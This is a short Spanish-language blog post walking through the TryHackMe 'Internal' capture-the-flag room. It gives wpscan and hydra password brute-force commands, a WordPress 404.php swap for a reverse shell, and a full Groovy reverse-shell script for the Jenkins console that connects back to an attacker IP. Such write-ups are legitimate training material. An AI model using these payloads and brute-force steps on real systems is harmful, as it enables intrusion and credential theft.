<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="author" content="">
<meta name="description" content="Tiramos nmap, sabemos que corre un wordpress.
encontramos un usuario gracias a wpscan:
wpscan &amp;ndash;url http://internal.thm/blog &amp;ndash;enumerate u
Encontramos el usuario &amp;ldquo;admin&amp;rdquo;
Encontramos su contraseña:
wpscan &amp;ndash;url http://internal.thm/blog -U admin -P /usr/share/wordlists/rockyou.txt
Constraseña: my2boys
Nos dirigimos al código 404.php y lo cambiamos por el de una reverse shell.
nc -lvnp 4444
Estamos dentro.
Abrimos el fichero cat /opt/wp-save.txt
Cojemos las credenciales y las introducimos en su aubreanna y abrimos user.txt." />
<meta name="keywords" content="homepage, blog, science, informatics, programming, hacking, pentesting" />
<meta name="robots" content="noodp" />
<meta name="theme-color" content="#252627" />
<link rel="canonical" href="/posts/internal/" />


    <title>
        
            [ TRYHACKME ] INTERNAL :: [ H4NS&#39; BLOG ] 
        
    </title>



<link href="https://cdnjs.cloudflare.com/ajax/libs/flag-icon-css/3.5.0/css/flag-icon.min.css" rel="stylesheet"
    type="text/css">



<link rel="stylesheet" href="/main.d7bdd8ee18bfbf4c605488a7e5b1b92cd980dfeed2bdaeab4dd5e931a7a78bc0.css">






<meta itemprop="name" content="[ TRYHACKME ] INTERNAL">
<meta itemprop="description" content="Tiramos nmap, sabemos que corre un wordpress.
encontramos un usuario gracias a wpscan:
wpscan &ndash;url http://internal.thm/blog &ndash;enumerate u
Encontramos el usuario &ldquo;admin&rdquo;
Encontramos su contraseña:
wpscan &ndash;url http://internal.thm/blog -U admin -P /usr/share/wordlists/rockyou.txt
Constraseña: my2boys
Nos dirigimos al código 404.php y lo cambiamos por el de una reverse shell.
nc -lvnp 4444
Estamos dentro.
Abrimos el fichero cat /opt/wp-save.txt
Cojemos las credenciales y las introducimos en su aubreanna y abrimos user.txt."><meta itemprop="datePublished" content="2021-03-28T13:17:53&#43;02:00" />
<meta itemprop="dateModified" content="2021-03-28T13:17:53&#43;02:00" />
<meta itemprop="wordCount" content="188"><meta itemprop="image" content="/"/>
<meta itemprop="keywords" content="" />
<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content="/"/>

<meta name="twitter:title" content="[ TRYHACKME ] INTERNAL"/>
<meta name="twitter:description" content="Tiramos nmap, sabemos que corre un wordpress.
encontramos un usuario gracias a wpscan:
wpscan &ndash;url http://internal.thm/blog &ndash;enumerate u
Encontramos el usuario &ldquo;admin&rdquo;
Encontramos su contraseña:
wpscan &ndash;url http://internal.thm/blog -U admin -P /usr/share/wordlists/rockyou.txt
Constraseña: my2boys
Nos dirigimos al código 404.php y lo cambiamos por el de una reverse shell.
nc -lvnp 4444
Estamos dentro.
Abrimos el fichero cat /opt/wp-save.txt
Cojemos las credenciales y las introducimos en su aubreanna y abrimos user.txt."/>








    <meta property="article:published_time" content="2021-03-28 13:17:53 &#43;0200 CEST" />








    </head>

    
        <body>
    
    
        <div class="container">
            <header class="header">
    <span class="header__inner">
        <a href="/" style="text-decoration: none;">
    <div class="logo">
        
            <span class="logo__mark">#</span>
            <span class="logo__text">cd /home</span>
            <span class="logo__cursor" style=
                  "
                   
                   ">
            </span>
        
    </div>
</a>


        <span class="header__right">
            
                <nav class="menu">
    <ul class="menu__inner"><li><a href="/about">About me</a></li><li><a href="/posts">Blog</a></li>
    </ul>
</nav>

                <span class="menu-trigger">
                    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
                        <path d="M0 0h24v24H0z" fill="none"/>
                        <path d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z"/>
                    </svg>
                </span>
            
        </span>
    </span>
</header>


            <div class="content">
                
  <main class="post">

    <div class="post-info">
      <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-clock">
          <circle cx="12" cy="12" r="10"></circle>
          <polyline points="12 6 12 12 16 14"></polyline>
        </svg>
        One minute

        
      </p>
    </div>

    <article>
      <h1 class="post-title">
        <a href="/posts/internal/">[ TRYHACKME ] INTERNAL</a>
      </h1>

      

      

      <div class="post-content">
        <p>Tiramos nmap, sabemos que corre un wordpress.</p>
<p>encontramos un usuario gracias a wpscan:</p>
<p>wpscan &ndash;url <a href="http://internal.thm/blog">http://internal.thm/blog</a> &ndash;enumerate u</p>
<p>Encontramos el usuario &ldquo;admin&rdquo;</p>
<p>Encontramos su contraseña:</p>
<p>wpscan &ndash;url <a href="http://internal.thm/blog">http://internal.thm/blog</a> -U  admin -P /usr/share/wordlists/rockyou.txt</p>
<p>Constraseña: my2boys</p>
<p>Nos dirigimos al código 404.php y lo cambiamos por el de una reverse shell.</p>
<p>nc -lvnp 4444</p>
<p>Estamos dentro.</p>
<p>Abrimos el fichero cat /opt/wp-save.txt</p>
<p>Cojemos las credenciales y las introducimos en su aubreanna y abrimos user.txt.</p>
<p>Nos conectamos a ssh con:</p>
<p>ssh -L 8888:172.17.0.2:8080 <a href="mailto:aubreanna@internal.thm">aubreanna@internal.thm</a></p>
<p>Vamos a la dirección 127.0.0.1:8888 y tenemos un login de jenkins</p>
<p>Para sacar la contraseña del admin:</p>
<p>hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 8888 127.0.0.1 http-post-form “/j_acegi_security_check:j_username=admin&amp;j_password=^PASS^&amp;from=%2F&amp;Submit=Sign+in&amp;Login=Login:Invalid username or password”</p>
<p>Contraseña: spongebob</p>
<p>Vamos a la consola &ldquo;localhost:8888/script&rdquo; y añadimos este código para crear una reverse shell dentro de Jenkins:</p>
<p>String host=&ldquo;10.14.5.201&rdquo;;
int port=6666;
String cmd=&ldquo;bash&rdquo;;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()&gt;0)so.write(pi.read());while(pe.available()&gt;0)so.write(pe.read());while(si.available()&gt;0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();</p>
<p>&ldquo;nc -lvnp 6666&rdquo; y ya tendriamos una shell inversa</p>
<p>find . -name *.txt 2&gt;/dev/null</p>
<p>cat /opt/note.txt y tenemos las credenciales de root</p>
<p>en la ssh ponemos &ldquo;su root&rdquo;, ponemos su contraseña y ya estariamos en root.</p>
<p>cat /root/root.txt y sacamos la segunda flag.</p>

      </div>
    </article>

    <hr />

    <div class="post-info">
      
      

      <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-file-text">
          <path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8z"></path>
          <polyline points="14 2 14 8 20 8"></polyline>
          <line x1="16" y1="13" x2="8" y2="13"></line>
          <line x1="16" y1="17" x2="8" y2="17"></line>
          <polyline points="10 9 9 9 8 9"></polyline>
        </svg>
        188 Words
      </p>

      <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-calendar">
          <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect>
          <line x1="16" y1="2" x2="16" y2="6"></line>
          <line x1="8" y1="2" x2="8" y2="6"></line>
          <line x1="3" y1="10" x2="21" y2="10"></line>
        </svg>
        
          2021-03-28 13:17 &#43;0200
        

         
          
        
      </p>
    </div>

    
    <div class="pagination">
        <div class="pagination__title">
            <span class="pagination__title-h"></span>
            <hr />
        </div>

        <div class="pagination__buttons">
            
            <span class="button previous">
                <a href="/posts/gatekeeper/">
                    <span class="button__icon">←</span>
                    <span class="button__text">[ TRYHACKME ] GATEKEEPER</span>
                </a>
            </span>
            

            
            <span class="button next">
                <a href="/posts/relevant/">
                    <span class="button__text">[ TRYHACKME ] RELEVANT</span>
                    <span class="button__icon">→</span>
                </a>
            </span>
            
        </div>
    </div>


    

    

  </main>

            </div>

            
                <footer class="footer">
    <div class="footer__inner">
        <div class="footer__content">
            <span>&copy; 2021</span>
            
            <span><a href="/posts/index.xml" target="_blank" title="rss"><svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 20 20" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-rss"><path d="M4 11a9 9 0 0 1 9 9"></path><path d="M4 4a16 16 0 0 1 16 16"></path><circle cx="5" cy="19" r="1"></circle></svg></a></span>
        </div>
    </div>
    <div class="footer__inner">
        <div class="footer__content">
            <span>Powered by <a href="http://gohugo.io">Hugo</a></span>
            <span>Made with &#10084; by <a href="https://github.com/rhazdon">Djordje Atlialp</a></span>
          </div>
    </div>
</footer>

            
        </div>

        



<script type="text/javascript" src="/bundle.min.2ce64ea6ea44a72b13dd812fc2eb5cca3efe878cce258a47c137c17edf46e0602a05e422b618a5b80b5939c731b7a293351c2f2222a21f6ee27e54a8448dd20e.js" integrity="sha512-LOZOpupEpysT3YEvwutcyj7&#43;h4zOJYpHwTfBft9G4GAqBeQithiluAtZOccxt6KTNRwvIiKiH27iflSoRI3SDg=="></script>



    </body>
</html>
